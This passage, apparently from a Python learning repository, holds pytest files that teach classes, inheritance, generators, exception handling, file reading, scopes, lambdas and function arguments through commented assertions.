https://docs.python.org/3/tutorial/classes.html#class-objects After defining the class attributes to a class, the class object can be created by assigning the object to a variable. The created object would have instance attributes associated with it. """ def test_class_objects(): """Class Objects. Class objects support two kinds of operations: - attribute references - instantiation. """ # ATTRIBUTE REFERENCES use the standard syntax used for all attribute references in # Python: obj.name. Valid attribute names are all the names that were in the class’s namespace # when the class object was created. For class MyCounter the following references are valid # attribute references: class ComplexNumber: """Example of the complex numbers class""" real = 0 imaginary = 0 def get_real(self): """Return real part of complex number.""" return self.real def get_imaginary(self): """Return imaginary part of complex number.""" return self.imaginary assert ComplexNumber.real == 0 # __doc__ is also a valid attribute, returning the docstring belonging to the class assert ComplexNumber.__doc__ == 'Example of the complex numbers class' # Class attributes can also be assigned to, so you can change the value of # ComplexNumber.counter by assignment. ComplexNumber.real = 10 assert ComplexNumber.real == 10 # CLASS INSTANTIATION uses function notation. Just pretend that the class object is a # parameterless function that returns a new instance of the class. For example # (assuming the above class): complex_number = ComplexNumber() assert complex_number.real == 10 assert complex_number.get_real() == 10 # Let's change counter default value back. ComplexNumber.real = 10 assert ComplexNumber.real == 10 # The instantiation operation (“calling” a class object) creates an empty object. Many classes # like to create objects with instances customized to a specific initial state. Therefore a # class may define a special method named __init__(), like this: class ComplexNumberWithConstructor: """Example of the class with constructor""" def __init__(self, real_part, imaginary_part): self.real = real_part self.imaginary = imaginary_part def get_real(self): """Return real part of complex number.""" return self.real def get_imaginary(self): """Return imaginary part of complex number.""" return self.imaginary complex_number = ComplexNumberWithConstructor(3.0, -4.5) assert complex_number.real, complex_number.imaginary == (3.0, -4.5) File: src/classes/test_class_definition.py """Class Definition Syntax. @see: https://docs.python.org/3/tutorial/classes.html Python is an object oriented programming language. Almost everything in Python is an object, with its properties and methods. A Class is like an object constructor, or a "blueprint" for creating objects. """ def test_class_definition(): """Class definition.""" # Class definitions, like function definitions (def statements) must be executed before they # have any effect. (You could conceivably place a class definition in a branch of an if # statement, or inside a function.) class GreetingClass: """Example of the class definition This class contains two public methods and doesn't contain constructor. """ name = 'user' def say_hello(self): """Class method.""" # The self parameter is a reference to the class itself, and is used to access variables # that belongs to the class. It does not have to be named self , you can call it # whatever you like, but it has to be the first parameter of any function in the class. return 'Hello ' + self.name def say_goodbye(self): """Class method.""" return 'Goodbye ' + self.name # When a class definition is entered, a new namespace is created, and used as the local scope — # thus, all assignments to local variables go into this new namespace. In particular, function # definitions bind the name of the new function here. # Class instantiation uses function notation. Just pretend that the class object is a # parameterless function that returns a new instance of the class. For example the following # code will creates a new instance of the class and assigns this object to the local variable. greeter = GreetingClass() assert greeter.say_hello() == 'Hello user' assert greeter.say_goodbye() == 'Goodbye user' File: src/classes/test_method_objects.py """Class Definition Syntax. @see: https://docs.python.org/3/tutorial/classes.html#method-objects Classes can have two types of attribute references: data or methods. Class methods are called by [variable_name].[method_name]([parameters]) as opposed to class data which lacks the (). """ class MyCounter: """A simple example of the counter class""" counter = 10 def get_counter(self): """Return the counter""" return self.counter def increment_counter(self): """Increment the counter""" self.counter += 1 return self.counter def test_method_objects(): """Method Objects.""" # The other kind of instance attribute reference is a method. A method is a function that # “belongs to” an object. (In Python, the term method is not unique to class instances: other # object types can have methods as well. For example, list objects have methods called append, # insert, remove, sort, and so on. However, in the following discussion, we’ll use the term # method exclusively to mean methods of class instance objects, unless explicitly stated # otherwise.) # But be aware that counter.get_counter() is not the same thing as MyCounter.get_counter() — # it is a method object, not a function object. # Usually, a method is called right after it is bound counter = MyCounter() assert counter.get_counter() == 10 # However, it is not necessary to call a method right away: counter.get_counter() is a method # object, and can be stored away and called at a later time. For example: get_counter = counter.get_counter assert get_counter() == 10 # What exactly happens when a method is called? You may have noticed that counter.get_counter() # was called without an argument above, even though the function definition for get_counter() # specified an argument (self). What happened to the argument? Surely Python raises an # exception when a function that requires an argument is called without any — even if the # argument isn’t actually used… # Actually, you may have guessed the answer: the special thing about methods is that the # instance object is passed as the first argument of the function. In our example, the call # counter.get_counter() is exactly equivalent to MyCounter.get_counter(counter). In general, # calling a method with a list of n arguments is equivalent to calling the corresponding # function with an argument list that is created by inserting the method’s instance object # before the first argument. assert counter.get_counter() == 10 assert MyCounter.get_counter(counter) == 10 File: src/classes/test_instance_objects.py """Class Definition Syntax. @see: https://docs.python.org/3/tutorial/classes.html#instance-objects """ def test_instance_objects(): """Instance Objects. Now what can we do with instance objects? The only operations understood by instance objects are attribute references. There are two kinds of valid attribute names: - data attributes - methods. """ # DATA ATTRIBUTES need not be declared; like local variables, they spring into existence when # they are first assigned to. For example, if x is the instance of MyCounter created above, # the following piece of code will print the value 16, without leaving a trace. # pylint: disable=too-few-public-methods class DummyClass: """Dummy class""" pass dummy_instance = DummyClass() # pylint: disable=attribute-defined-outside-init dummy_instance.temporary_attribute = 1 assert dummy_instance.temporary_attribute == 1 del dummy_instance.temporary_attribute File: src/classes/test_inheritance.py """Inheritance @see: https://docs.python.org/3/tutorial/classes.html#inheritance Inheritance is one of the principles of object-oriented programming. Since classes may share a lot of the same code, inheritance allows a derived class to reuse the same code and modify accordingly """ # pylint: disable=too-few-public-methods class Person: """Example of the base class""" def __init__(self, name): self.name = name def get_name(self): """Get person name""" return self.name # The syntax for a derived class definition looks like this. # pylint: disable=too-few-public-methods class Employee(Person): """Example of the derived class The Base Class (in our case Person) must be defined in a scope containing the derived class definition. In place of a base class name, other arbitrary expressions are also allowed. Derived classes may override methods of their base classes. Because methods have no special privileges when calling other methods of the same object, a method of a base class that calls another method defined in the same base class may end up calling a method of a derived class that overrides it. An overriding method in a derived class may in fact want to extend rather than simply replace the base class method of the same name. There is a simple way to call the base class method directly: just call BaseClassName.methodname(self, arguments). This is occasionally useful to clients as well. (Note that this only works if the base class is accessible as BaseClassName in the global scope.) """ def __init__(self, name, staff_id): Person.__init__(self, name) # You may also use super() here in order to avoid explicit using of parent class name: # >>> super().__init__(name) self.staff_id = staff_id def get_full_id(self): """Get full employee id""" return self.get_name() + ', ' + self.staff_id def test_inheritance(): """Inheritance.""" # There’s nothing special about instantiation of derived classes: DerivedClassName() creates a # new instance of the class. Method references are resolved as follows: the corresponding class # attribute is searched, descending down the chain of base classes if necessary, and the method # reference is valid if this yields a function object. person = Person('Bill') employee = Employee('John', 'A23') assert person.get_name() == 'Bill' assert employee.get_name() == 'John' assert employee.get_full_id() == 'John, A23' # Python has two built-in functions that work with inheritance: # # - Use isinstance() to check an instance’s type: isinstance(obj, int) will be True only if # obj.__class__ is int or some class derived from int. # # - Use issubclass() to check class inheritance: issubclass(bool, int) is True since bool is # a subclass of int. However, issubclass(float, int) is False since float is not a subclass # of int. assert isinstance(employee, Employee) assert not isinstance(person, Employee) assert isinstance(person, Person) assert isinstance(employee, Person) assert issubclass(Employee, Person) assert not issubclass(Person, Employee) File: src/classes/test_multiple_inheritance.py """Multiple Inheritance @see: https://docs.python.org/3/tutorial/classes.html#multiple-inheritance Some classes may derive from multiple classes. This means that the derived class would have its attributes, along with the attributes of all the classes that it was derived from. """ def test_multiple_inheritance(): """Multiple Inheritance""" # pylint: disable=too-few-public-methods class Clock: """Clock class""" time = '11:23 PM' def get_time(self): """Get current time Method is hardcoded just for multiple inheritance illustration. """ return self.time # pylint: disable=too-few-public-methods class Calendar: """Calendar class""" date = '12/08/2018' def get_date(self): """Get current date Method is hardcoded just for multiple inheritance illustration. """ return self.date # Python supports a form of multiple inheritance as well. A class definition with multiple # base classes looks like this. class CalendarClock(Clock, Calendar): """Class that uses multiple inheritance. For most purposes, in the simplest cases, you can think of the search for attributes inherited from a parent class as depth-first, left-to-right, not searching twice in the same class where there is an overlap in the hierarchy. Thus, if an attribute is not found in CalendarClock, it is searched for in Clock, then (recursively) in the base classes of Clock, and if it was not found there, it was searched for in Calendar, and so on. In fact, it is slightly more complex than that; the method resolution order changes dynamically to support cooperative calls to super(). This approach is known in some other multiple-inheritance languages as call-next-method and is more powerful than the super call found in single-inheritance languages. Dynamic ordering is necessary because all cases of multiple inheritance exhibit one or more diamond relationships (where at least one of the parent classes can be accessed through multiple paths from the bottommost class). For example, all classes inherit from object, so any case of multiple inheritance provides more than one path to reach object. To keep the base classes from being accessed more than once, the dynamic algorithm linearizes the search order in a way that preserves the left-to-right ordering specified in each class, that calls each parent only once, and that is monotonic (meaning that a class can be subclassed without affecting the precedence order of its parents). """ calendar_clock = CalendarClock() assert calendar_clock.get_date() == '12/08/2018' assert calendar_clock.get_time() == '11:23 PM' File: src/additions/test_pass.py """PASS statement @see: https://docs.python.org/3/tutorial/controlflow.html The pass statement does nothing. It can be used when a statement is required syntactically but the program requires no action. """ def test_pass_in_function(): """PASS statement in function "Pass" can be used as a place-holder for a function or conditional body when you are working on new code, allowing you to keep thinking at a more abstract level. The pass statement below is silently ignored but it makes current test_pass() function valid. """ pass def test_pass_in_loop(): """PASS in loops. "Pass" can be used when a statement is required syntactically but the program requires no action. For example: """ # pylint: disable=unused-variable for number in range(100): # It just don't do anything but for loop is still valid. pass # Example above is quite useless but it was given just for illustration of the idea. # The more useful example might be: # # while True: # pass # Busy-wait for keyboard interrupt (Ctrl+C) # pylint: disable=too-few-public-methods class MyEmptyClass: """PASS statement in class "Pass" is commonly used for creating minimal classes like current one. """ pass File: src/additions/test_generators.py """Generators. @see: https://www.learnpython.org/en/Generators Generators are used to create iterators, but with a different approach. Generators are simple functions which return an iterable set of items, one at a time, in a special way. When an iteration over a set of item starts using the for statement, the generator is run. Once the generator's function code reaches a "yield" statement, the generator yields its execution back to the for loop, returning a new value from the set. The generator function can generate as many values (possibly infinite) as it wants, yielding each one in its turn. """ import random def lottery(): """Generator function example. Here is a simple example of a generator function which returns random integers. This function decides how to generate the random numbers on its own, and executes the yield statements one at a time, pausing in between to yield execution back to the main for loop. """ # returns first 3 random numbers between 1 and 10 # pylint: disable=unused-variable for _ in range(3): yield random.randint(1, 10) # returns a 4th number between 10 and 20 yield random.randint(10, 20) def test_generators(): """Yield statement""" for number_index, random_number in enumerate(lottery()): if number_index < 3: assert 0 <= random_number <= 10 else: assert 10 <= random_number <= 20 File: src/exceptions/test_raise_exceptions.py """Raising Exceptions. @see: https://docs.python.org/3/tutorial/errors.html#raising-exceptions The raise statement allows the programmer to force a specified exception to occur. """ def test_raise_exception(): """Raising Exceptions. The raise statement allows the programmer to force a specified exception to occur. """ exception_is_caught = False try: # The sole argument to raise indicates the exception to be raised. This must be either an # exception instance or an exception class (a class that derives from Exception). If an # exception class is passed, it will be implicitly instantiated by calling its constructor # with no arguments raise NameError('HiThere') # shorthand for 'raise ValueError()' except NameError: exception_is_caught = True assert exception_is_caught def test_user_defined_exception(): """User-defined Exceptions""" # Programs may name their own exceptions by creating a new exception class. Exceptions should # typically be derived from the Exception class, either directly or indirectly. # Most exceptions are defined with names that end in “Error,” similar to the naming of the # standard exceptions. Many standard modules define their own exceptions to report errors # that may occur in functions they define. class MyCustomError(Exception): """Example of MyCustomError exception.""" def __init__(self, message): super().__init__(message) self.message = message custom_exception_is_caught = False try: raise MyCustomError('My custom message') except MyCustomError: custom_exception_is_caught = True assert custom_exception_is_caught File: src/exceptions/test_handle_exceptions.py """Errors and Exceptions. @see: https://docs.python.org/3/tutorial/errors.html#errors-and-exceptions Even if a statement or expression is syntactically correct, it may cause an error when an attempt is made to execute it. Errors detected during execution are called exceptions and are not unconditionally fatal. It is possible to write programs that handle selected exceptions. """ def test_handle_exceptions(): """Handling of exceptions The try statement works as follows. - First, the try clause (the statement(s) between the try and except keywords) is executed. - If no exception occurs, the except clause is skipped and execution of the try statement is finished. - If an exception occurs during execution of the try clause, the rest of the clause is skipped. Then if its type matches the exception named after the except keyword, the except clause is executed, and then execution continues after the try statement. - If an exception occurs which does not match the exception named in the except clause, it is passed on to outer try statements; if no handler is found, it is an unhandled exception and execution stops with a message. """ # Let's simulate division by zero exception. exception_has_been_handled = False try: result = 10 * (1 / 0) # division by zero # We should not get here at all. assert result except ZeroDivisionError: # We should get here because of division by zero. exception_has_been_handled = True assert exception_has_been_handled # Let's simulate undefined variable access exception. exception_has_been_handled = False try: # pylint: disable=undefined-variable result = 4 + spam * 3 # name 'spam' is not defined # We should not get here at all. assert result except NameError: # We should get here because of division by zero. exception_has_been_handled = True assert exception_has_been_handled # A try statement may have more than one except clause, to specify handlers for different # exceptions. At most one handler will be executed. Handlers only handle exceptions that occur # in the corresponding try clause, not in other handlers of the same try statement. An except # clause may name multiple exceptions as a parenthesized tuple, for example: exception_has_been_handled = False try: result = 10 * (1 / 0) # division by zero # We should not get here at all. assert result except (ZeroDivisionError, NameError): # We should get here because of division by zero. exception_has_been_handled = True assert exception_has_been_handled # Exception handlers may be chained. exception_has_been_handled = False try: result = 10 * (1 / 0) # division by zero # We should not get here at all. assert result except NameError: # We should get here because of division by zero. exception_has_been_handled = True except ZeroDivisionError: # We should get here because of division by zero. exception_has_been_handled = True assert exception_has_been_handled # The try … except statement has an optional else clause, which, when present, must follow all # except clauses. It is useful for code that must be executed if the try clause does not raise # an exception. For example: exception_has_been_handled = False no_exceptions_has_been_fired = False try: result = 10 # We should not get here at all. assert result except NameError: # We should get here because of division by zero. exception_has_been_handled = True else: no_exceptions_has_been_fired = True assert not exception_has_been_handled assert no_exceptions_has_been_fired File: src/files/test_file_reading.py """Reading and Writing Files @see: https://docs.python.org/3/tutorial/inputoutput.html#reading-and-writing-files The process of reading and writing to a file is like finding a book and opening a book. First, the file is located, opened to the first page, then reading/writing begins until it reaches the end of the file. """ def test_files_open(): """Open files open() returns a file object, and is most commonly used with two arguments: open(filename, mode). The first argument is a string containing the filename. The second argument is another string containing a few characters describing the way in which the file will be used. mode can be: - 'r' when the file will only be read, - 'w' for only writing (an existing file with the same name will be erased), - 'a' opens the file for appending; any data written to the file is automatically added to end. - 'r+' opens the file for both reading and writing. The mode argument is optional; 'r' will be assumed if it’s omitted. Normally, files are opened in text mode, that means, you read and write strings from and to the file, which are encoded in a specific encoding. If encoding is not specified, the default is platform dependent (see open()). 'b' appended to the mode opens the file in binary mode: now the data is read and written in the form of bytes objects. This mode should be used for all files that don’t contain text. In text mode, the default when reading is to convert platform-specific line endings (\n on Unix, \r\n on Windows) to just \n. When writing in text mode, the default is to convert occurrences of \n back to platform-specific line endings. This behind-the-scenes modification to file data is fine for text files, but will corrupt binary data like that in JPEG or EXE files. Be very careful to use binary mode when reading and writing such files. It is good practice to use the with keyword when dealing with file objects. The advantage is that the file is properly closed after its suite finishes, even if an exception is raised at some point. Using with is also much shorter than writing equivalent try-finally blocks: """ # Open files without using 'with' statement. file = open('src/files/multi_line_file.txt', 'r') assert not file.closed read_data = file.read() assert read_data == ( 'first line\n' 'second line\n' 'third line' ) file.close() assert file.closed # Open file using with. with open('src/files/multi_line_file.txt', 'r') as file: read_data = file.read() assert read_data == ( 'first line\n' 'second line\n' 'third line' ) assert file.closed # If you’re not using the with keyword, then you should call f.close() to close the file and # immediately free up any system resources used by it. If you don’t explicitly close a file, # Python’s garbage collector will eventually destroy the object and close the open file for you, # but the file may stay open for a while. Another risk is that different Python implementations # will do this clean-up at different times. File: src/files/test_file_methods.py """Methods of File Objects @see: https://docs.python.org/3/tutorial/inputoutput.html#methods-of-file-objects Reading from a file does not always have to be sequential. There are methods to look for specific locations in the file, much like flipping to a page in a book. """ def test_file_methods(): """Methods of File Objects""" multi_line_file = open('src/files/multi_line_file.txt', 'r') binary_file = open('src/files/binary_file', 'r') # To read a file’s contents, call f.read(size), which reads some quantity of data and returns # it as a string (in text mode) or bytes object (in binary mode). size is an optional numeric # argument. When size is omitted or negative, the entire contents of the file will be read and # returned; it’s your problem if the file is twice as large as your machine’s memory. Otherwise, # at most size bytes are read and returned. If the end of the file has been reached, f.read() # will return an empty string (''). read_data = multi_line_file.read() # pylint: disable=duplicate-code assert read_data == 'first line\nsecond line\nthird line' # To change the file object’s position, use f.seek(offset, from_what). The position is computed # from adding offset to a reference point; the reference point is selected by the from_what # argument. A from_what value of 0 measures from the beginning of the file, 1 uses the current # file position, and 2 uses the end of the file as the reference point. from_what can be omitted # and defaults to 0, using the beginning of the file as the reference point. assert binary_file.seek(0) == 0 # Go to the 0th byte in the file assert binary_file.seek(6) == 6 # Go to the 6th byte in the file assert binary_file.read(1) == '6' # f.readline() reads a single line from the file; a newline character (\n) is left at the end # of the string, and is only omitted on the last line of the file if the file doesn’t end in a # newline. This makes the return value unambiguous; if f.readline() returns an empty string, # the end of the file has been reached, while a blank line is represented by '\n', a string # containing only a single newline. multi_line_file.seek(0) assert multi_line_file.readline() == 'first line\n' assert multi_line_file.readline() == 'second line\n' assert multi_line_file.readline() == 'third line' assert multi_line_file.readline() == '' multi_line_file.close() binary_file.close() File: src/functions/test_function_arbitrary_arguments.py """Arbitrary Argument Lists @see: https://docs.python.org/3/tutorial/controlflow.html#arbitrary-argument-lists Function can be called with an arbitrary number of arguments. These arguments will be wrapped up in a tuple. Before the variable number of arguments, zero or more normal arguments may occur. """ def test_function_arbitrary_arguments(): """Arbitrary Argument Lists""" # When a final formal parameter of the form **name is present, it receives a dictionary # containing all keyword arguments except for those corresponding to a formal parameter. # This may be combined with a formal parameter of the form *name which receives a tuple # containing the positional arguments beyond the formal parameter list. # (*name must occur before **name.) For example, if we define a function like this: def test_function(first_param, *arguments): """This function accepts its arguments through "arguments" tuple""" assert first_param == 'first param' assert arguments == ('second param', 'third param') test_function('first param', 'second param', 'third param') # Normally, these variadic arguments will be last in the list of formal parameters, because # they scoop up all remaining input arguments that are passed to the function. Any formal # parameters which occur after the *args parameter are ‘keyword-only’ arguments, meaning that # they can only be used as keywords rather than positional arguments. def concat(*args, sep='/'): return sep.join(args) assert concat('earth', 'mars', 'venus') == 'earth/mars/venus' assert concat('earth', 'mars', 'venus', sep='.') == 'earth.mars.venus' File: src/functions/test_function_default_arguments.py """Default Argument Values @see: https://docs.python.org/3/tutorial/controlflow.html#default-argument-values The most useful form is to specify a default value for one or more arguments. This creates a function that can be called with fewer arguments than it is defined to allow. """ def power_of(number, power=2): """ Raises number to specific power. You may notice that by default the function raises number to the power of two. """ return number ** power def test_default_function_arguments(): """Test default function arguments""" # This function power_of can be called in several ways because it has default value for # the second argument. First we may call it omitting the second argument at all. assert power_of(3) == 9 # We may also want to override the second argument by using the following function calls. assert power_of(3, 2) == 9 assert power_of(3, 3) == 27 File: src/functions/test_function_scopes.py """Scopes and Namespaces. @see: https://docs.python.org/3/tutorial/classes.html#scopes-and-namespaces-example A NAMESPACE is a mapping from names to objects. Most namespaces are currently implemented as Python dictionaries, but that’s normally not noticeable in any way (except for performance), and it may change in the future. Examples of namespaces are: the set of built-in names (containing functions such as abs(), and built-in exception names); the global names in a module; and the local names in a function invocation. In a sense the set of attributes of an object also form a namespace. The important thing to know about namespaces is that there is absolutely no relation between names in different namespaces; for instance, two different modules may both define a function maximize without confusion — users of the modules must prefix it with the module name. By the way, we use the word attribute for any name following a dot — for example, in the expression z.real, real is an attribute of the object z. Strictly speaking, references to names in modules are attribute references: in the expression modname.func_name, modname is a module object and func_name is an attribute of it. In this case there happens to be a straightforward mapping between the module’s attributes and the global names defined in the module: they share the same namespace! A SCOPE is a textual region of a Python program where a namespace is directly accessible. “Directly accessible” here means that an unqualified reference to a name attempts to find the name in the namespace. Although scopes are determined statically, they are used dynamically. At any time during execution, there are at least three nested scopes whose namespaces are directly accessible: - the innermost scope, which is searched first, contains the local names. - the scopes of any enclosing functions, which are searched starting with the nearest enclosing scope, contains non-local, but also non-global names. - the next-to-last scope contains the current module’s global names. - the outermost scope (searched last) is the namespace containing built-in names. BE CAREFUL!!! ------------- Changing global or nonlocal variables from within an inner function might be a BAD practice and might lead to harder debugging and to more fragile code! Do this only if you know what you're doing. """ # pylint: disable=invalid-name test_variable = 'initial global value' def test_function_scopes(): """Scopes and Namespaces Example""" # This is an example demonstrating how to reference the different scopes and namespaces, and # how global and nonlocal affect variable binding: # pylint: disable=redefined-outer-name test_variable = 'initial value inside test function' def do_local(): # Create variable that is only accessible inside current do_local() function. # pylint: disable=redefined-outer-name test_variable = 'local value' return test_variable def do_nonlocal(): # Address the variable from outer scope and try to change it. # pylint: disable=redefined-outer-name nonlocal test_variable test_variable = 'nonlocal value' return test_variable def do_global(): # Address the variable from very global scope and try to change it. # pylint: disable=redefined-outer-name,global-statement global test_variable test_variable = 'global value' return test_variable # On this level currently we have access to local for test_function_scopes() function variable. assert test_variable == 'initial value inside test function' # Do local assignment. # It doesn't change global variable and variable from test_function_scopes() scope. do_local() assert test_variable == 'initial value inside test function' # Do non local assignment. # It doesn't change global variable but it does change variable # from test_function_scopes() function scope. do_nonlocal() assert test_variable == 'nonlocal value' # Do global assignment. # This one changes global variable but doesn't change variable from # test_function_scopes() function scope. do_global() assert test_variable == 'nonlocal value' def test_global_variable_access(): """Testing global variable access from within a function""" # Global value of test_variable has been already changed by do_global() function in previous # test so let's check that. # pylint: disable=global-statement global test_variable assert test_variable == 'global value' # On this example you may see how accessing and changing global variables from within inner # functions might make debugging more difficult and code to be less predictable. Since you # might have expected that test_variable should still be equal to 'initial global value' but # it was changed by "someone" and you need to know about the CONTEXT of who had changed that. # So once again access global and non local scope only if you know what you're doing otherwise # it might be considered as bad practice. File: src/functions/test_function_documentation_string.py """Documentation Strings. @see: https://docs.python.org/3/tutorial/controlflow.html#documentation-strings Here are some conventions about the content and formatting of documentation strings. The first line should always be a short, concise summary of the object’s purpose. For brevity, it should not explicitly state the object’s name or type, since these are available by other means (except if the name happens to be a verb describing a function’s operation). This line should begin with a capital letter and end with a period. If there are more lines in the documentation string, the second line should be blank, visually separating the summary from the rest of the description. The following lines should be one or more paragraphs describing the object’s calling conventions, its side effects, etc. """ def do_nothing(): """Do nothing, but document it. No, really, it doesn't do anything. """ pass def test_function_documentation_string(): """Test documentation string.""" # The Python parser does not strip indentation from multi-line string literals in Python, so # tools that process documentation have to strip indentation if desired. This is done using the # following convention. The first non-blank line after the first line of the string determines # the amount of indentation for the entire documentation string. (We can’t use the first line # since it is generally adjacent to the string’s opening quotes so its indentation is not # apparent in the string literal.) Whitespace “equivalent” to this indentation is then stripped # from the start of all lines of the string. Lines that are indented less should not occur, but # if they occur all their leading whitespace should be stripped. Equivalence of whitespace # should be tested after expansion of tabs (to 8 spaces, normally). assert do_nothing.__doc__ == """Do nothing, but document it. No, really, it doesn't do anything. """ File: src/functions/test_function_annotations.py """Function Annotations. @see: https://docs.python.org/3/tutorial/controlflow.html#function-annotations Function annotations are completely optional metadata information about the types used by user-defined functions. Annotations are stored in the __annotations__ attribute of the function as a dictionary and have no effect on any other part of the function. Parameter annotations are defined by a colon after the parameter name, followed by an expression evaluating to the value of the annotation. Return annotations are defined by a literal ->, followed by an expression, between the parameter list and the colon denoting the end of the def statement. """ def breakfast(ham: str, eggs: str = 'eggs') -> str: """Breakfast creator. This function has a positional argument, a keyword argument, and the return value annotated. """ return ham + ' and ' + eggs def test_function_annotations(): """Function Annotations.""" assert breakfast.__annotations__ == {'eggs': str, 'ham': str, 'return': str} File: src/functions/test_lambda_expressions.py """Lambda Expressions @see: https://docs.python.org/3/tutorial/controlflow.html#lambda-expressions Small anonymous functions can be created with the lambda keyword. Lambda functions can be used wherever function objects are required. They are syntactically restricted to a single expression. Semantically, they are just syntactic sugar for a normal function definition. Like nested function definitions, lambda functions can reference variables from the containing scope. """ def test_lambda_expressions(): """Lambda Expressions""" # This function returns the sum of its two arguments: lambda a, b: a+b # Like nested function definitions, lambda functions can reference variables from the # containing scope. def make_increment_function(delta): """This example uses a lambda expression to return a function""" return lambda number: number + delta increment_function = make_increment_function(42) assert increment_function(0) == 42 assert increment_function(1) == 43 assert increment_function(2) == 44 # Another use of lambda is to pass a small function as an argument. pairs = [(1, 'one'), (2, 'two'), (3, 'three'), (4, 'four')] # Sort pairs by text key. pairs.sort(key=lambda pair: pair[1]) assert pairs == [(4, 'four'), (1, 'one'), (3, 'three'), (2, 'two')] File: src/functions/test_function_definition.py """Function Definition @see: https://docs.python.org/3/tutorial/controlflow.html#defining-functions @see: https://www.thecodeship.com/patterns/guide-to-python-function-decorators/ The keyword def introduces a function definition. It must be followed by the function name and the parenthesized list of formal parameters. The statements that form the body of the function start at the next line, and must be indented. """ def fibonacci_function_example(number_limit): """Generate a Fibonacci series up to number_limit. The first statement of the function body can optionally be a string literal; this string literal is the function’s documentation string, or docstring. There are tools which use docstrings to automatically produce online or printed documentation, or to let the user interactively browse through code; it’s good practice to include docstrings in code that you write, so make a habit of it. """ # The execution of a function introduces a new symbol table used for the local variables of the # function. More precisely, all variable assignments in a function store the value in the local # symbol table; whereas variable references first look in the local symbol table, then in the # local symbol tables of enclosing functions, then in the global symbol table, and finally in # the table of built-in names. Thus, global variables cannot be directly assigned a value # within a function (unless named in a global statement), although they may be referenced. fibonacci_list = [] previous_number, current_number = 0, 1 while previous_number < number_limit: # The statement result.append(a) calls a method of the list object result. A method is a # function that ‘belongs’ to an object and is named obj.methodname, where obj is some # object (this may be an expression), and methodname is the name of a method that is # defined by the object’s type. Different types define different methods. Methods of # different types may have the same name without causing ambiguity. (It is possible to # define your own object types and methods, using classes, see Classes) The method # append() shown in the example is defined for list objects; it adds a new element at # the end of the list. In this example it is equivalent to result = result + [a], but # more efficient. fibonacci_list.append(previous_number) # This is multiple assignment statement. We make current number to be previous one and the # sum of previous and current to be a new current. previous_number, current_number = current_number, previous_number + current_number # The return statement returns with a value from a function. return without an expression # argument returns None. Falling off the end of a function also returns None. return fibonacci_list def test_function_definition(): """Function Definition""" # Now call the function we just defined. assert fibonacci_function_example(300) == [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233] # A function definition introduces the function name in the current symbol table. The value of # the function name has a type that is recognized by the interpreter as a user-defined function. # This value can be assigned to another name which can then also be used as a function. This # serves as a general renaming mechanism fibonacci_function_clone = fibonacci_function_example assert fibonacci_function_clone(300) == [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233] # In Python, functions are first class citizens, they are objects and that means we can do a # lot of useful stuff with them. # Assign functions to variables. def greet(name): return 'Hello, ' + name greet_someone = greet assert greet_someone('John') == 'Hello, John' # Define functions inside other functions. def greet_again(name): def get_message(): return 'Hello, ' result = get_message() + name return result assert greet_again('John') == 'Hello, John' # Functions can be passed as parameters to other functions. def greet_one_more(name): return 'Hello, ' + name def call_func(func): other_name = 'John' return func(other_name) assert call_func(greet_one_more) == 'Hello, John' # Functions can return other functions. In other words, functions generating other functions. def compose_greet_func(): def get_message(): return 'Hello there!' return get_message greet_function = compose_greet_func() assert greet_function() == 'Hello there!' # Inner functions have access to the enclosing scope. # More commonly known as a closure. A very powerful pattern that we will come across while # building decorators. Another thing to note, Python only allows read access to the outer # scope and not assignment. Notice how we modified the example above to read a "name" argument # from the enclosing scope of the inner function and return the new function. def compose_greet_func_with_closure(name): def get_message(): return 'Hello there, ' + name + '!' return get_message greet_with_closure = compose_greet_func_with_closure('John') assert greet_with_closure() == 'Hello there, John!' File: src/functions/test_function_keyword_arguments.py """Keyword Arguments @see: https://docs.python.org/3/tutorial/controlflow.html#keyword-arguments Functions can be called using keyword arguments of the form kwarg=value. """ import pytest def parrot(voltage, state='a stiff', action='voom', parrot_type='Norwegian Blue'): """Example of multi-argument function This function accepts one required argument (voltage) and three optional arguments (state, action, and type). """ message = 'This parrot wouldn\'t ' + action + ' ' message += 'if you put ' + str(voltage) + ' volts through it. ' message += 'Lovely plumage, the ' + parrot_type + '. ' message += 'It\'s ' + state + '!' return message def test_function_keyword_arguments(): """Test calling function with specifying keyword arguments""" # The parrot function accepts one required argument (voltage) and three optional arguments # (state, action, and type). This function can be called in any of the following ways: message = ( "This parrot wouldn't voom if you put 1000 volts through it. " "Lovely plumage, the Norwegian Blue. " "It's a stiff!" ) # 1 positional argument assert parrot(1000) == message # 1 keyword argument assert parrot(voltage=1000) == message message = ( "This parrot wouldn't VOOOOOM if you put 1000000 volts through it. " "Lovely plumage, the Norwegian Blue. " "It's a stiff!" ) # 2 keyword arguments assert parrot(voltage=1000000, action='VOOOOOM') == message # 2 keyword arguments assert parrot(action='VOOOOOM', voltage=1000000) == message # 3 positional arguments message = ( "This parrot wouldn't jump if you put 1000000 volts through it. " "Lovely plumage, the Norwegian Blue. " "It's bereft of life!" ) assert parrot(1000000, 'bereft of life', 'jump') == message # 1 positional, 1 keyword message = ( "This parrot wouldn't voom if you put 1000 volts through it. " "Lovely plumage, the Norwegian Blue. " "It's pushing up the daisies!" ) assert parrot(1000, state='pushing up the daisies') == message # But all the following calls would be invalid. with pytest.raises(Exception): # Required argument missing. # pylint: disable=no-value-for-parameter parrot() # Non-keyword argument after a keyword argument. # parrot(voltage=5.0, 'dead') with pytest.raises(Exception): # pylint: disable=redundant-keyword-arg parrot(110, voltage=220) with pytest.raises(Exception): # unknown keyword argument # pylint: disable=unexpected-keyword-arg,no-value-for-parameter parrot(actor='John Cleese') # In a function call, keyword arguments must follow positional arguments. All the keyword # arguments passed must match one of the arguments accepted by the function (e.g. actor is not # a valid argument for the parrot function), and their order is not important. This also # includes non-optional arguments (e.g. parrot(voltage=1000) is valid too). No argument may # receive a value more than once. Here’s an example that fails due to this restriction: def function_with_one_argument(number): return number with pytest.raises(Exception): # pylint: disable=redundant-keyword-arg function_with_one_argument(0, number=0) # When a final formal parameter of the form **name is present, it receives a dictionary # containing all keyword arguments except for those corresponding to a formal parameter. # This may be combined with a formal parameter of the form *name which receives a tuple # containing the positional arguments beyond the formal parameter list. # (*name must occur before **name.) For example, if we define a function like this: def test_function(first_param, *arguments, **keywords): """This function accepts its arguments through "arguments" tuple and keywords dictionary.""" assert first_param == 'first param' assert arguments == ('second param', 'third param') assert keywords == { 'fourth_param_name': 'fourth named param', 'fifth_param_name': 'fifth named param' } test_function( 'first param', 'second param', 